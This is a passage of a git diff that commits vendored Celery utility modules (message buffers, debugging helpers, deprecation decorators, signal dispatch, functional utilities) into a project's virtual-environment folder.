self.minlen) + + def __bool__(self): + # type: () -> bool + return bool(self._data) + __nonzero__ = __bool__ # Py2 + + @property + def _heap_overload(self): + # type: () -> float + """Compute how much is heap bigger than data [percents].""" + return len(self._heap) * 100 / max(len(self._data), 1) - 100 + + +MutableSet.register(LimitedSet) + + +class Evictable: + """Mixin for classes supporting the ``evict`` method.""" + + Empty = Empty + + def evict(self) -> None: + """Force evict until maxsize is enforced.""" + self._evict(range=count) + + def _evict(self, limit: int = 100, range=range) -> None: + try: + [self._evict1() for _ in range(limit)] + except IndexError: + pass + + def _evict1(self) -> None: + if self._evictcount <= self.maxsize: + raise IndexError() + try: + self._pop_to_evict() + except self.Empty: + raise IndexError() + + +class Messagebuffer(Evictable): + """A buffer of pending messages.""" + + Empty = Empty + + def __init__(self, maxsize, iterable=None, deque=deque): + # type: (int, Iterable, Any) -> None + self.maxsize = maxsize + self.data = deque(iterable or []) + self._append = self.data.append + self._pop = self.data.popleft + self._len = self.data.__len__ + self._extend = self.data.extend + + def put(self, item): + # type: (Any) -> None + self._append(item) + self.maxsize and self._evict() + + def extend(self, it): + # type: (Iterable) -> None + self._extend(it) + self.maxsize and self._evict() + + def take(self, *default): + # type: (*Any) -> Any + try: + return self._pop() + except IndexError: + if default: + return default[0] + raise self.Empty() + + def _pop_to_evict(self): + # type: () -> None + return self.take() + + def __repr__(self): + # type: () -> str + return f'<{type(self).__name__}: {len(self)}/{self.maxsize}>' + + def __iter__(self): + # type: () -> Iterable + while 1: + try: + yield self._pop() + except IndexError: + break + + def __len__(self): + # type: () -> int + return self._len() + + def 
__contains__(self, item) -> bool:
+        return item in self.data
+
+    def __reversed__(self):
+        # type: () -> Iterable
+        return reversed(self.data)
+
+    def __getitem__(self, index):
+        # type: (Any) -> Any
+        return self.data[index]
+
+    @property
+    def _evictcount(self):
+        # type: () -> int
+        return len(self)
+
+
+Sequence.register(Messagebuffer)
+
+
+class BufferMap(OrderedDict, Evictable):
+    """Map of buffers."""
+
+    Buffer = Messagebuffer
+    Empty = Empty
+
+    maxsize = None
+    total = 0
+    bufmaxsize = None
+
+    def __init__(self, maxsize, iterable=None, bufmaxsize=1000):
+        # type: (int, Iterable, int) -> None
+        super().__init__()
+        self.maxsize = maxsize
+        self.bufmaxsize = bufmaxsize
+        if iterable:
+            self.update(iterable)
+        # total counts buffered items, so sum over the buffers themselves.
+        self.total = sum(len(buf) for buf in self.values())
+
+    def put(self, key, item):
+        # type: (Any, Any) -> None
+        self._get_or_create_buffer(key).put(item)
+        self.total += 1
+        self.move_to_end(key)   # least recently used.
+        self.maxsize and self._evict()
+
+    def extend(self, key, it):
+        # type: (Any, Iterable) -> None
+        self._get_or_create_buffer(key).extend(it)
+        self.total += len(it)
+        self.maxsize and self._evict()
+
+    def take(self, key, *default):
+        # type: (Any, *Any) -> Any
+        item, throw = None, False
+        try:
+            buf = self[key]
+        except KeyError:
+            throw = True
+        else:
+            try:
+                item = buf.take()
+                self.total -= 1
+            except self.Empty:
+                throw = True
+            else:
+                self.move_to_end(key)  # mark as LRU
+
+        if throw:
+            if default:
+                return default[0]
+            raise self.Empty()
+        return item
+
+    def _get_or_create_buffer(self, key):
+        # type: (Any) -> Messagebuffer
+        try:
+            return self[key]
+        except KeyError:
+            buf = self[key] = self._new_buffer()
+            return buf
+
+    def _new_buffer(self):
+        # type: () -> Messagebuffer
+        return self.Buffer(maxsize=self.bufmaxsize)
+
+    def _LRUpop(self, *default):
+        # type: (*Any) -> Any
+        return self[self._LRUkey()].take(*default)
+
+    def _pop_to_evict(self):
+        # type: () -> None
+        for _ in range(100):
+            key = self._LRUkey()
+            buf = self[key]
+            try:
+                buf.take()
+            except (IndexError, self.Empty):
+                # buffer empty, remove it from mapping.
+                self.pop(key)
+            else:
+                # we removed one item
+                self.total -= 1
+                # if buffer is empty now, remove it from mapping.
+                if not len(buf):
+                    self.pop(key)
+                else:
+                    # move to least recently used.
+ self.move_to_end(key) + break + + def __repr__(self): + # type: () -> str + return f'<{type(self).__name__}: {self.total}/{self.maxsize}>' + + @property + def _evictcount(self): + # type: () -> int + return self.total diff --git a/env/Lib/site-packages/celery/utils/debug.py b/env/Lib/site-packages/celery/utils/debug.py new file mode 100644 index 00000000..3515dc84 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/debug.py @@ -0,0 +1,193 @@ +"""Utilities for debugging memory usage, blocking calls, etc.""" +import os +import sys +import traceback +from contextlib import contextmanager +from functools import partial +from pprint import pprint + +from celery.platforms import signals +from celery.utils.text import WhateverIO + +try: + from psutil import Process +except ImportError: + Process = None + +__all__ = ( + 'blockdetection', 'sample_mem', 'memdump', 'sample', + 'humanbytes', 'mem_rss', 'ps', 'cry', +) + +UNITS = ( + (2 ** 40.0, 'TB'), + (2 ** 30.0, 'GB'), + (2 ** 20.0, 'MB'), + (2 ** 10.0, 'KB'), + (0.0, 'b'), +) + +_process = None +_mem_sample = [] + + +def _on_blocking(signum, frame): + import inspect + raise RuntimeError( + f'Blocking detection timed-out at: {inspect.getframeinfo(frame)}' + ) + + +@contextmanager +def blockdetection(timeout): + """Context that raises an exception if process is blocking. + + Uses ``SIGALRM`` to detect blocking functions. + """ + if not timeout: + yield + else: + old_handler = signals['ALRM'] + old_handler = None if old_handler == _on_blocking else old_handler + + signals['ALRM'] = _on_blocking + + try: + yield signals.arm_alarm(timeout) + finally: + if old_handler: + signals['ALRM'] = old_handler + signals.reset_alarm() + + +def sample_mem(): + """Sample RSS memory usage. + + Statistics can then be output by calling :func:`memdump`. + """ + current_rss = mem_rss() + _mem_sample.append(current_rss) + return current_rss + + +def _memdump(samples=10): # pragma: no cover + S = _mem_sample + prev = list(S) if len(S) <= samples else sample(S, samples) + _mem_sample[:] = [] + import gc + gc.collect() + after_collect = mem_rss() + return prev, after_collect + + +def memdump(samples=10, file=None): # pragma: no cover + """Dump memory statistics. + + Will print a sample of all RSS memory samples added by + calling :func:`sample_mem`, and in addition print + used RSS memory after :func:`gc.collect`. + """ + say = partial(print, file=file) + if ps() is None: + say('- rss: (psutil not installed).') + return + prev, after_collect = _memdump(samples) + if prev: + say('- rss (sample):') + for mem in prev: + say(f'- > {mem},') + say(f'- rss (end): {after_collect}.') + + +def sample(x, n, k=0): + """Given a list `x` a sample of length ``n`` of that list is returned. + + For example, if `n` is 10, and `x` has 100 items, a list of every tenth. + item is returned. + + ``k`` can be used as offset. + """ + j = len(x) // n + for _ in range(n): + try: + yield x[k] + except IndexError: + break + k += j + + +def hfloat(f, p=5): + """Convert float to value suitable for humans. + + Arguments: + f (float): The floating point number. + p (int): Floating point precision (default is 5). 
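+
+    Example (illustrative; output assumes the default precision p=5):
+        >>> hfloat(3.1415926535)
+        '3.1416'
+        >>> hfloat(10.0)
+        10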
+ """ + i = int(f) + return i if i == f else '{0:.{p}}'.format(f, p=p) + + +def humanbytes(s): + """Convert bytes to human-readable form (e.g., KB, MB).""" + return next( + f'{hfloat(s / div if div else s)}{unit}' + for div, unit in UNITS if s >= div + ) + + +def mem_rss(): + """Return RSS memory usage as a humanized string.""" + p = ps() + if p is not None: + return humanbytes(_process_memory_info(p).rss) + + +def ps(): # pragma: no cover + """Return the global :class:`psutil.Process` instance. + + Note: + Returns :const:`None` if :pypi:`psutil` is not installed. + """ + global _process + if _process is None and Process is not None: + _process = Process(os.getpid()) + return _process + + +def _process_memory_info(process): + try: + return process.memory_info() + except AttributeError: + return process.get_memory_info() + + +def cry(out=None, sepchr='=', seplen=49): # pragma: no cover + """Return stack-trace of all active threads. + + See Also: + Taken from https://gist.github.com/737056. + """ + import threading + + out = WhateverIO() if out is None else out + P = partial(print, file=out) + + # get a map of threads by their ID so we can print their names + # during the traceback dump + tmap = {t.ident: t for t in threading.enumerate()} + + sep = sepchr * seplen + for tid, frame in sys._current_frames().items(): + thread = tmap.get(tid) + if not thread: + # skip old junk (left-overs from a fork) + continue + P(f'{thread.name}') + P(sep) + traceback.print_stack(frame, file=out) + P(sep) + P('LOCAL VARIABLES') + P(sep) + pprint(frame.f_locals, stream=out) + P('\n') + return out.getvalue() diff --git a/env/Lib/site-packages/celery/utils/deprecated.py b/env/Lib/site-packages/celery/utils/deprecated.py new file mode 100644 index 00000000..a08b08b9 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/deprecated.py @@ -0,0 +1,113 @@ +"""Deprecation utilities.""" +import warnings + +from vine.utils import wraps + +from celery.exceptions import CDeprecationWarning, CPendingDeprecationWarning + +__all__ = ('Callable', 'Property', 'warn') + + +PENDING_DEPRECATION_FMT = """ + {description} is scheduled for deprecation in \ + version {deprecation} and removal in version v{removal}. \ + {alternative} +""" + +DEPRECATION_FMT = """ + {description} is deprecated and scheduled for removal in + version {removal}. {alternative} +""" + + +def warn(description=None, deprecation=None, + removal=None, alternative=None, stacklevel=2): + """Warn of (pending) deprecation.""" + ctx = {'description': description, + 'deprecation': deprecation, 'removal': removal, + 'alternative': alternative} + if deprecation is not None: + w = CPendingDeprecationWarning(PENDING_DEPRECATION_FMT.format(**ctx)) + else: + w = CDeprecationWarning(DEPRECATION_FMT.format(**ctx)) + warnings.warn(w, stacklevel=stacklevel) + + +def Callable(deprecation=None, removal=None, + alternative=None, description=None): + """Decorator for deprecated functions. + + A deprecation warning will be emitted when the function is called. + + Arguments: + deprecation (str): Version that marks first deprecation, if this + argument isn't set a ``PendingDeprecationWarning`` will be + emitted instead. + removal (str): Future version when this feature will be removed. + alternative (str): Instructions for an alternative solution (if any). + description (str): Description of what's being deprecated. 
+ """ + def _inner(fun): + + @wraps(fun) + def __inner(*args, **kwargs): + from .imports import qualname + warn(description=description or qualname(fun), + deprecation=deprecation, + removal=removal, + alternative=alternative, + stacklevel=3) + return fun(*args, **kwargs) + return __inner + return _inner + + +def Property(deprecation=None, removal=None, + alternative=None, description=None): + """Decorator for deprecated properties.""" + def _inner(fun): + return _deprecated_property( + fun, deprecation=deprecation, removal=removal, + alternative=alternative, description=description or fun.__name__) + return _inner + + +class _deprecated_property: + + def __init__(self, fget=None, fset=None, fdel=None, doc=None, **depreinfo): + self.__get = fget + self.__set = fset + self.__del = fdel + self.__name__, self.__module__, self.__doc__ = ( + fget.__name__, fget.__module__, fget.__doc__, + ) + self.depreinfo = depreinfo + self.depreinfo.setdefault('stacklevel', 3) + + def __get__(self, obj, type=None): + if obj is None: + return self + warn(**self.depreinfo) + return self.__get(obj) + + def __set__(self, obj, value): + if obj is None: + return self + if self.__set is None: + raise AttributeError('cannot set attribute') + warn(**self.depreinfo) + self.__set(obj, value) + + def __delete__(self, obj): + if obj is None: + return self + if self.__del is None: + raise AttributeError('cannot delete attribute') + warn(**self.depreinfo) + self.__del(obj) + + def setter(self, fset): + return self.__class__(self.__get, fset, self.__del, **self.depreinfo) + + def deleter(self, fdel): + return self.__class__(self.__get, self.__set, fdel, **self.depreinfo) diff --git a/env/Lib/site-packages/celery/utils/dispatch/__init__.py b/env/Lib/site-packages/celery/utils/dispatch/__init__.py new file mode 100644 index 00000000..b9329a7e --- /dev/null +++ b/env/Lib/site-packages/celery/utils/dispatch/__init__.py @@ -0,0 +1,4 @@ +"""Observer pattern.""" +from .signal import Signal + +__all__ = ('Signal',) diff --git a/env/Lib/site-packages/celery/utils/dispatch/signal.py b/env/Lib/site-packages/celery/utils/dispatch/signal.py new file mode 100644 index 00000000..0cfa6127 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/dispatch/signal.py @@ -0,0 +1,354 @@ +"""Implementation of the Observer pattern.""" +import sys +import threading +import warnings +import weakref +from weakref import WeakMethod + +from kombu.utils.functional import retry_over_time + +from celery.exceptions import CDeprecationWarning +from celery.local import PromiseProxy, Proxy +from celery.utils.functional import fun_accepts_kwargs +from celery.utils.log import get_logger +from celery.utils.time import humanize_seconds + +__all__ = ('Signal',) + +logger = get_logger(__name__) + + +def _make_id(target): # pragma: no cover + if isinstance(target, Proxy): + target = target._get_current_object() + if isinstance(target, (bytes, str)): + # see Issue #2475 + return target + if hasattr(target, '__func__'): + return id(target.__func__) + return id(target) + + +def _boundmethod_safe_weakref(obj): + """Get weakref constructor appropriate for `obj`. `obj` may be a bound method. + + Bound method objects must be special-cased because they're usually garbage + collected immediately, even if the instance they're bound to persists. + + Returns: + a (weakref constructor, main object) tuple. `weakref constructor` is + either :class:`weakref.ref` or :class:`weakref.WeakMethod`. 
`main + object` is the instance that `obj` is bound to if it is a bound method; + otherwise `main object` is simply `obj. + """ + try: + obj.__func__ + obj.__self__ + # Bound method + return WeakMethod, obj.__self__ + except AttributeError: + # Not a bound method + return weakref.ref, obj + + +def _make_lookup_key(receiver, sender, dispatch_uid): + if dispatch_uid: + return (dispatch_uid, _make_id(sender)) + else: + return (_make_id(receiver), _make_id(sender)) + + +NONE_ID = _make_id(None) + +NO_RECEIVERS = object() + +RECEIVER_RETRY_ERROR = """\ +Could not process signal receiver %(receiver)s. Retrying %(when)s...\ +""" + + +class Signal: # pragma: no cover + """Create new signal. + + Keyword Arguments: + providing_args (List): A list of the arguments this signal can pass + along in a :meth:`send` call. + use_caching (bool): Enable receiver cache. + name (str): Name of signal, used for debugging purposes. + """ + + #: Holds a dictionary of + #: ``{receiverkey (id): weakref(receiver)}`` mappings. + receivers = None + + def __init__(self, providing_args=None, use_caching=False, name=None): + self.receivers = [] + self.providing_args = set( + providing_args if providing_args is not None else []) + self.lock = threading.Lock() + self.use_caching = use_caching + self.name = name + # For convenience we create empty caches even if they are not used. + # A note about caching: if use_caching is defined, then for each + # distinct sender we cache the receivers that sender has in + # 'sender_receivers_cache'. The cache is cleaned when .connect() or + # .disconnect() is called and populated on .send(). + self.sender_receivers_cache = ( + weakref.WeakKeyDictionary() if use_caching else {} + ) + self._dead_receivers = False + + def _connect_proxy(self, fun, sender, weak, dispatch_uid): + return self.connect( + fun, sender=sender._get_current_object(), + weak=weak, dispatch_uid=dispatch_uid, + ) + + def connect(self, *args, **kwargs): + """Connect receiver to sender for signal. + + Arguments: + receiver (Callable): A function or an instance method which is to + receive signals. Receivers must be hashable objects. + + if weak is :const:`True`, then receiver must be + weak-referenceable. + + Receivers must be able to accept keyword arguments. + + If receivers have a `dispatch_uid` attribute, the receiver will + not be added if another receiver already exists with that + `dispatch_uid`. + + sender (Any): The sender to which the receiver should respond. + Must either be a Python object, or :const:`None` to + receive events from any sender. + + weak (bool): Whether to use weak references to the receiver. + By default, the module will attempt to use weak references to + the receiver objects. If this parameter is false, then strong + references will be used. + + dispatch_uid (Hashable): An identifier used to uniquely identify a + particular instance of a receiver. This will usually be a + string, though it may be anything hashable. + + retry (bool): If the signal receiver raises an exception + (e.g. ConnectionError), the receiver will be retried until it + runs successfully. A strong ref to the receiver will be stored + and the `weak` option will be ignored. 
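+
+        Example (an illustrative sketch; the signal and receiver names
+        are hypothetical):
+            >>> my_signal = Signal(name='my_signal')
+            >>> @my_signal.connect
+            ... def receiver(sender=None, **kwargs):
+            ...     print('got signal from', sender)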
+ """ + def _handle_options(sender=None, weak=True, dispatch_uid=None, + retry=False): + + def _connect_signal(fun): + + options = {'dispatch_uid': dispatch_uid, + 'weak': weak} + + def _retry_receiver(retry_fun): + + def _try_receiver_over_time(*args, **kwargs): + def on_error(exc, intervals, retries): + interval = next(intervals) + err_msg = RECEIVER_RETRY_ERROR % \ + {'receiver': retry_fun, + 'when': humanize_seconds(interval, 'in', ' ')} + logger.error(err_msg) + return interval + + return retry_over_time(retry_fun, Exception, args, + kwargs, on_error) + + return _try_receiver_over_time + + if retry: + options['weak'] = False + if not dispatch_uid: + # if there's no dispatch_uid then we need to set the + # dispatch uid to the original func id so we can look + # it up later with the original func id + options['dispatch_uid'] = _make_id(fun) + fun = _retry_receiver(fun) + + self._connect_signal(fun, sender, options['weak'], + options['dispatch_uid']) + return fun + + return _connect_signal + + if args and callable(args[0]): + return _handle_options(*args[1:], **kwargs)(args[0]) + return _handle_options(*args, **kwargs) + + def _connect_signal(self, receiver, sender, weak, dispatch_uid): + assert callable(receiver), 'Signal receivers must be callable' + if not fun_accepts_kwargs(receiver): + raise ValueError( + 'Signal receiver must accept keyword arguments.') + + if isinstance(sender, PromiseProxy): + sender.__then__( + self._connect_proxy, receiver, sender, weak, dispatch_uid, + ) + return receiver + + lookup_key = _make_lookup_key(receiver, sender, dispatch_uid) + + if weak: + ref, receiver_object = _boundmethod_safe_weakref(receiver) + receiver = ref(receiver) + weakref.finalize(receiver_object, self._remove_receiver) + + with self.lock: + self._clear_dead_receivers() + for r_key, _ in self.receivers: + if r_key == lookup_key: + break + else: + self.receivers.append((lookup_key, receiver)) + self.sender_receivers_cache.clear() + + return receiver + + def disconnect(self, receiver=None, sender=None, weak=None, + dispatch_uid=None): + """Disconnect receiver from sender for signal. + + If weak references are used, disconnect needn't be called. + The receiver will be removed from dispatch automatically. + + Arguments: + receiver (Callable): The registered receiver to disconnect. + May be none if `dispatch_uid` is specified. + + sender (Any): The registered sender to disconnect. + + weak (bool): The weakref state to disconnect. + + dispatch_uid (Hashable): The unique identifier of the receiver + to disconnect. + """ + if weak is not None: + warnings.warn( + 'Passing `weak` to disconnect has no effect.', + CDeprecationWarning, stacklevel=2) + + lookup_key = _make_lookup_key(receiver, sender, dispatch_uid) + + disconnected = False + with self.lock: + self._clear_dead_receivers() + for index in range(len(self.receivers)): + (r_key, _) = self.receivers[index] + if r_key == lookup_key: + disconnected = True + del self.receivers[index] + break + self.sender_receivers_cache.clear() + return disconnected + + def has_listeners(self, sender=None): + return bool(self._live_receivers(sender)) + + def send(self, sender, **named): + """Send signal from sender to all connected receivers. + + If any receiver raises an error, the exception is returned as the + corresponding response. (This is different from the "send" in + Django signals. In Celery "send" and "send_robust" do the same thing.) + + Arguments: + sender (Any): The sender of the signal. + Either a specific object or :const:`None`. 
+ **named (Any): Named arguments which will be passed to receivers. + + Returns: + List: of tuple pairs: `[(receiver, response), … ]`. + """ + responses = [] + if not self.receivers or \ + self.sender_receivers_cache.get(sender) is NO_RECEIVERS: + return responses + + for receiver in self._live_receivers(sender): + try: + response = receiver(signal=self, sender=sender, **named) + except Exception as exc: # pylint: disable=broad-except + if not hasattr(exc, '__traceback__'): + exc.__traceback__ = sys.exc_info()[2] + logger.exception( + 'Signal handler %r raised: %r', receiver, exc) + responses.append((receiver, exc)) + else: + responses.append((receiver, response)) + return responses + send_robust = send # Compat with Django interface. + + def _clear_dead_receivers(self): + # Warning: caller is assumed to hold self.lock + if self._dead_receivers: + self._dead_receivers = False + new_receivers = [] + for r in self.receivers: + if isinstance(r[1], weakref.ReferenceType) and r[1]() is None: + continue + new_receivers.append(r) + self.receivers = new_receivers + + def _live_receivers(self, sender): + """Filter sequence of receivers to get resolved, live receivers. + + This checks for weak references and resolves them, then returning only + live receivers. + """ + receivers = None + if self.use_caching and not self._dead_receivers: + receivers = self.sender_receivers_cache.get(sender) + # We could end up here with NO_RECEIVERS even if we do check this + # case in .send() prior to calling _Live_receivers() due to + # concurrent .send() call. + if receivers is NO_RECEIVERS: + return [] + if receivers is None: + with self.lock: + self._clear_dead_receivers() + senderkey = _make_id(sender) + receivers = [] + for (receiverkey, r_senderkey), receiver in self.receivers: + if r_senderkey == NONE_ID or r_senderkey == senderkey: + receivers.append(receiver) + if self.use_caching: + if not receivers: + self.sender_receivers_cache[sender] = NO_RECEIVERS + else: + # Note: we must cache the weakref versions. + self.sender_receivers_cache[sender] = receivers + non_weak_receivers = [] + for receiver in receivers: + if isinstance(receiver, weakref.ReferenceType): + # Dereference the weak reference. + receiver = receiver() + if receiver is not None: + non_weak_receivers.append(receiver) + else: + non_weak_receivers.append(receiver) + return non_weak_receivers + + def _remove_receiver(self, receiver=None): + """Remove dead receivers from connections.""" + # Mark that the self..receivers first has dead weakrefs. If so, + # we will clean those up in connect, disconnect and _live_receivers + # while holding self.lock. Note that doing the cleanup here isn't a + # good idea, _remove_receiver() will be called as a side effect of + # garbage collection, and so the call can happen wh ile we are already + # holding self.lock. 
+ self._dead_receivers = True + + def __repr__(self): + """``repr(signal)``.""" + return f'<{type(self).__name__}: {self.name} providing_args={self.providing_args!r}>' + + def __str__(self): + """``str(signal)``.""" + return repr(self) diff --git a/env/Lib/site-packages/celery/utils/functional.py b/env/Lib/site-packages/celery/utils/functional.py new file mode 100644 index 00000000..5fb0d633 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/functional.py @@ -0,0 +1,402 @@ +"""Functional-style utilities.""" +import inspect +from collections import UserList +from functools import partial +from itertools import islice, tee, zip_longest +from typing import Any, Callable + +from kombu.utils.functional import LRUCache, dictfilter, is_list, lazy, maybe_evaluate, maybe_list, memoize +from vine import promise + +from celery.utils.log import get_logger + +logger = get_logger(__name__) + +__all__ = ( + 'LRUCache', 'is_list', 'maybe_list', 'memoize', 'mlazy', 'noop', + 'first', 'firstmethod', 'chunks', 'padlist', 'mattrgetter', 'uniq', + 'regen', 'dictfilter', 'lazy', 'maybe_evaluate', 'head_from_fun', + 'maybe', 'fun_accepts_kwargs', +) + +FUNHEAD_TEMPLATE = """ +def {fun_name}({fun_args}): + return {fun_value} +""" + + +class DummyContext: + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + pass + + +class mlazy(lazy): + """Memoized lazy evaluation. + + The function is only evaluated once, every subsequent access + will return the same value. + """ + + #: Set to :const:`True` after the object has been evaluated. + evaluated = False + _value = None + + def evaluate(self): + if not self.evaluated: + self._value = super().evaluate() + self.evaluated = True + return self._value + + +def noop(*args, **kwargs): + """No operation. + + Takes any arguments/keyword arguments and does nothing. + """ + + +def pass1(arg, *args, **kwargs): + """Return the first positional argument.""" + return arg + + +def evaluate_promises(it): + for value in it: + if isinstance(value, promise): + value = value() + yield value + + +def first(predicate, it): + """Return the first element in ``it`` that ``predicate`` accepts. + + If ``predicate`` is None it will return the first item that's not + :const:`None`. + """ + return next( + (v for v in evaluate_promises(it) if ( + predicate(v) if predicate is not None else v is not None)), + None, + ) + + +def firstmethod(method, on_call=None): + """Multiple dispatch. + + Return a function that with a list of instances, + finds the first instance that gives a value for the given method. + + The list can also contain lazy instances + (:class:`~kombu.utils.functional.lazy`.) + """ + + def _matcher(it, *args, **kwargs): + for obj in it: + try: + meth = getattr(maybe_evaluate(obj), method) + reply = (on_call(meth, *args, **kwargs) if on_call + else meth(*args, **kwargs)) + except AttributeError: + pass + else: + if reply is not None: + return reply + + return _matcher + + +def chunks(it, n): + """Split an iterator into chunks with `n` elements each. + + Warning: + ``it`` must be an actual iterator, if you pass this a + concrete sequence will get you repeating elements. + + So ``chunks(iter(range(1000)), 10)`` is fine, but + ``chunks(range(1000), 10)`` is not. 
+ + Example: + # n == 2 + >>> x = chunks(iter([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]), 2) + >>> list(x) + [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10]] + + # n == 3 + >>> x = chunks(iter([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]), 3) + >>> list(x) + [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10]] + """ + for item in it: + yield [item] + list(islice(it, n - 1)) + + +def padlist(container, size, default=None): + """Pad list with default elements. + + Example: + >>> first, last, city = padlist(['George', 'Costanza', 'NYC'], 3) + ('George', 'Costanza', 'NYC') + >>> first, last, city = padlist(['George', 'Costanza'], 3) + ('George', 'Costanza', None) + >>> first, last, city, planet = padlist( + ... ['George', 'Costanza', 'NYC'], 4, default='Earth', + ... ) + ('George', 'Costanza', 'NYC', 'Earth') + """ + return list(container)[:size] + [default] * (size - len(container)) + + +def mattrgetter(*attrs): + """Get attributes, ignoring attribute errors. + + Like :func:`operator.itemgetter` but return :const:`None` on missing + attributes instead of raising :exc:`AttributeError`. + """ + return lambda obj: {attr: getattr(obj, attr, None) for attr in attrs} + + +def uniq(it): + """Return all unique elements in ``it``, preserving order.""" + seen = set() + return (seen.add(obj) or obj for obj in it if obj not in seen) + + +def lookahead(it): + """Yield pairs of (current, next) items in `it`. + + `next` is None if `current` is the last item. + Example: + >>> list(lookahead(x for x in range(6))) + [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, None)] + """ + a, b = tee(it) + next(b, None) + return zip_longest(a, b) + + +def regen(it): + """Convert iterator to an object that can be consumed multiple times. + + ``Regen`` takes any iterable, and if the object is an + generator it will cache the evaluated list on first access, + so that the generator can be "consumed" multiple times. + """ + if isinstance(it, (list, tuple)): + return it + return _regen(it) + + +class _regen(UserList, list): + # must be subclass of list so that json can encode. + + def __init__(self, it): + # pylint: disable=super-init-not-called + # UserList creates a new list and sets .data, so we don't + # want to call init here. 
+ self.__it = it + self.__consumed = [] + self.__done = False + + def __reduce__(self): + return list, (self.data,) + + def map(self, func): + self.__consumed = [func(el) for el in self.__consumed] + self.__it = map(func, self.__it) + + def __length_hint__(self): + return self.__it.__length_hint__() + + def __lookahead_consume(self, limit=None): + if not self.__done and (limit is None or limit > 0): + it = iter(self.__it) + try: + now = next(it) + except StopIteration: + return + self.__consumed.append(now) + # Maintain a single look-ahead to ensure we set `__done` when the + # underlying iterator gets exhausted + while not self.__done: + try: + next_ = next(it) + self.__consumed.append(next_) + except StopIteration: + self.__done = True + break + finally: + yield now + now = next_ + # We can break out when `limit` is exhausted + if limit is not None: + limit -= 1 + if limit <= 0: + break + + def __iter__(self): + yield from self.__consumed + yield from self.__lookahead_consume() + + def __getitem__(self, index): + if index < 0: + return self.data[index] + # Consume elements up to the desired index prior to attempting to + # access it from within `__consumed` + consume_count = index - len(self.__consumed) + 1 + for _ in self.__lookahead_consume(limit=consume_count): + pass + return self.__consumed[index] + + def __bool__(self): + if len(self.__consumed): + return True + + try: + next(iter(self)) + except StopIteration: + return False + else: + return True + + @property + def data(self): + if not self.__done: + self.__consumed.extend(self.__it) + self.__done = True + return self.__consumed + + def __repr__(self): + return "<{}: [{}{}]>".format( + self.__class__.__name__, + ", ".join(repr(e) for e in self.__consumed), + "..." if not self.__done else "", + ) + + +def _argsfromspec(spec, replace_defaults=True): + if spec.defaults: + split = len(spec.defaults) + defaults = (list(range(len(spec.defaults))) if replace_defaults + else spec.defaults) + positional = spec.args[:-split] + optional = list(zip(spec.args[-split:], defaults)) + else: + positional, optional = spec.args, [] + + varargs = spec.varargs + varkw = spec.varkw + if spec.kwonlydefaults: + kwonlyargs = set(spec.kwonlyargs) - set(spec.kwonlydefaults.keys()) + if replace_defaults: + kwonlyargs_optional = [ + (kw, i) for i, kw in enumerate(spec.kwonlydefaults.keys()) + ] + else: + kwonlyargs_optional = list(spec.kwonlydefaults.items()) + else: + kwonlyargs, kwonlyargs_optional = spec.kwonlyargs, [] + + return ', '.join(filter(None, [ + ', '.join(positional), + ', '.join(f'{k}={v}' for k, v in optional), + f'*{varargs}' if varargs else None, + '*' if (kwonlyargs or kwonlyargs_optional) and not varargs else None, + ', '.join(kwonlyargs) if kwonlyargs else None, + ', '.join(f'{k}="{v}"' for k, v in kwonlyargs_optional), + f'**{varkw}' if varkw else None, + ])) + + +def head_from_fun(fun: Callable[..., Any], bound: bool = False) -> str: + """Generate signature function from actual function.""" + # we could use inspect.Signature here, but that implementation + # is very slow since it implements the argument checking + # in pure-Python. Instead we use exec to create a new function + # with an empty body, meaning it has the same performance as + # as just calling a function. 
+ is_function = inspect.isfunction(fun) + is_callable = callable(fun) + is_cython = fun.__class__.__name__ == 'cython_function_or_method' + is_method = inspect.ismethod(fun) + + if not is_function and is_callable and not is_method and not is_cython: + name, fun = fun.__class__.__name__, fun.__call__ + else: + name = fun.__name__ + definition = FUNHEAD_TEMPLATE.format( + fun_name=name, + fun_args=_argsfromspec(inspect.getfullargspec(fun)), + fun_value=1, + ) + logger.debug(definition) + namespace = {'__name__': fun.__module__} + # pylint: disable=exec-used + # Tasks are rarely, if ever, created at runtime - exec here is fine. + exec(definition, namespace) + result = namespace[name] + result._source = definition + if bound: + return partial(result, object()) + return result + + +def arity_greater(fun, n): + argspec = inspect.getfullargspec(fun) + return argspec.varargs or len(argspec.args) > n + + +def fun_takes_argument(name, fun, position=None): + spec = inspect.getfullargspec(fun) + return ( + spec.varkw or spec.varargs or + (len(spec.args) >= position if position else name in spec.args) + ) + + +def fun_accepts_kwargs(fun): + """Return true if function accepts arbitrary keyword arguments.""" + return any( + p for p in inspect.signature(fun).parameters.values() + if p.kind == p.VAR_KEYWORD + ) + + +def maybe(typ, val): + """Call typ on value if val is defined.""" + return typ(val) if val is not None else val + + +def seq_concat_item(seq, item): + """Return copy of sequence seq with item added. + + Returns: + Sequence: if seq is a tuple, the result will be a tuple, + otherwise it depends on the implementation of ``__add__``. + """ + return seq + (item,) if isinstance(seq, tuple) else seq + [item] + + +def seq_concat_seq(a, b): + """Concatenate two sequences: ``a + b``. + + Returns: + Sequence: The return value will depend on the largest sequence + - if b is larger and is a tuple, the return value will be a tuple. + - if a is larger and is a list, the return value will be a list, + """ + # find the type of the largest sequence + prefer = type(max([a, b], key=len)) + # convert the smallest list to the type of the largest sequence. + if not isinstance(a, prefer): + a = prefer(a) + if not isinstance(b, prefer): + b = prefer(b) + return a + b + + +def is_numeric_value(value): + return isinstance(value, (int, float)) and not isinstance(value, bool) diff --git a/env/Lib/site-packages/celery/utils/graph.py b/env/Lib/site-packages/celery/utils/graph.py new file mode 100644 index 00000000..c1b0b55b --- /dev/null +++ b/env/Lib/site-packages/celery/utils/graph.py @@ -0,0 +1,309 @@ +"""Dependency graph implementation.""" +from collections import Counter +from textwrap import dedent + +from kombu.utils.encoding import bytes_to_str, safe_str + +__all__ = ('DOT', 'CycleError', 'DependencyGraph', 'GraphFormatter') + + +class DOT: + """Constants related to the dot format.""" + + HEAD = dedent(""" + {IN}{type} {id} {{ + {INp}graph [{attrs}] + """) + ATTR = '{name}={value}' + NODE = '{INp}"{0}" [{attrs}]' + EDGE = '{INp}"{0}" 